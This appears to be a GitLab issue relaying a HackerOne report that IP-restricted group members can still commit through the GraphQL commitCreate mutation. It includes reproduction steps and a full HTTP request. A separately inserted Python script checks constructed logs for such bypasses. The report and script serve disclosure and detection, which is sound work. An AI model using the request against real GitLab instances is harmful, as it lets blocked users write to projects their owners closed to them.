
Users on banned IP addresses can still commit to projects

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1914049 by js_noob on 2023-03-21, assigned to GitLab Team:


Report

Summary

Hello team, as a part of the grp/project security an owner can block certain IP addresses from accessing that group resources (projects,...). However, even if a user is on a blocked IP address he can still commit to projects.

Steps to reproduce
  1. Create a grp, project and add a maintainer
  2. From the owner navigate to https://gitlab.com/groups/YOUR_GRP/-/edit#js-permissions-settings and add the maintainer IP address under Restrict access by IP address
  3. From the maintainer navigate to https://gitlab.com/GRP/PROJECT/-/tree/main and verify the 404
  4. From the maintainer send the following request, but change the variables according to your preferences
```http
POST /api/graphql HTTP/2
Host: gitlab.com
Cookie: YOUR_COOKIES
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/-/graphql-explorer?_gl=1*1mb1g5a*_ga*MjM3Mzk5MDUzLjE2NzczMjcxMTY.*_ga_ENFH3X7M5Y*MTY3ODk4Mzg2Ni40LjEuMTY3ODk4MzkwNi4wLjAuMA..
Content-Type: application/json
X-Csrf-Token: xD3r11jgwirOfA6E1GB1pL9ZEuq8lqQCYcrZo4eSO8xbfvb9kmkI5BmsLqWWtgLw894u3hwjqXeGO4LbPJ_cNg
Content-Length: 489
Origin: https://gitlab.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"query":"mutation MyMutation {\n  commitCreate(\n    input: {\n      projectPath: \"test645811/project-1\",\n      branch: \"main\",\n      message: \"This is a Commit\",\n      actions: [\n        {\n          action: UPDATE,\n          filePath: \"README.md\",\n          content: \"This is a test content\",\n          encoding: TEXT\n        }\n      ]\n    }\n  ) {\n    commit {\n      author {\n        name\n      }\n    }\n  }\n}\n","variables":null,"operationName":"MyMutation"}
```
  5. Verify the successful response and from the owner verify the creation of the commit
Video/POC

bandicam_2023-03-21_20-40-59-702.mp4

Impact

Users from banned IP addresses can manage to push changes to projects where they should be completely blocked from accessing any project that belongs to that group.
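A defender-side check for the condition the report describes, added here as an example and not part of the report or of GitLab's own code: it scans constructed api_json.log-style records (the field names are an assumption, not GitLab's exact log schema) for commitCreate mutations that returned 200 from an IP outside the owning group's allowlist, which is exactly the write path the UI's 404 did not cover.

```python
import ipaddress
import json

# Constructed sample log records (shape is an assumption, not GitLab's schema).
# Line 1: commitCreate from an IP outside the allowlist that still succeeded.
# Line 2: the same mutation from an allowed IP.
# Line 3: the web tree route from the blocked IP, correctly returning 404.
SAMPLE_LOG = """
{"remote_ip": "203.0.113.7", "path": "/api/graphql", "mutation": "commitCreate", "project_path": "test645811/project-1", "status": 200}
{"remote_ip": "198.51.100.20", "path": "/api/graphql", "mutation": "commitCreate", "project_path": "test645811/project-1", "status": 200}
{"remote_ip": "203.0.113.7", "path": "/test645811/project-1/-/tree/main", "mutation": null, "project_path": "test645811/project-1", "status": 404}
"""

# Constructed allowlist: group "test645811" only permits 198.51.100.0/24.
GROUP_IP_RESTRICTIONS = {"test645811": ["198.51.100.0/24"]}


def ip_allowed(remote_ip, cidrs):
    """True if remote_ip falls inside any of the group's allowed CIDR ranges."""
    addr = ipaddress.ip_address(remote_ip)
    return any(addr in ipaddress.ip_network(c, strict=False) for c in cidrs)


def group_of(project_path):
    """Top-level namespace of a project path, e.g. 'grp/project' -> 'grp'."""
    return project_path.split("/", 1)[0]


def find_bypasses(log_text, restrictions):
    """Return records where a project in an IP-restricted group was written to
    through a successful GraphQL commitCreate from a non-allowlisted IP."""
    hits = []
    for line in log_text.strip().splitlines():
        rec = json.loads(line)
        cidrs = restrictions.get(group_of(rec["project_path"]))
        if not cidrs or ip_allowed(rec["remote_ip"], cidrs):
            continue  # group unrestricted, or request came from an allowed IP
        if (rec["path"] == "/api/graphql"
                and rec["mutation"] == "commitCreate"
                and rec["status"] == 200):
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in find_bypasses(SAMPLE_LOG, GROUP_IP_RESTRICTIONS):
        print("IP restriction bypass:", hit["remote_ip"], hit["project_path"])
```

The same walk should flag every other write route (REST commits API, git push over HTTP) once it is extended to those paths; a 404 on the UI alone is not evidence the restriction holds.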

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: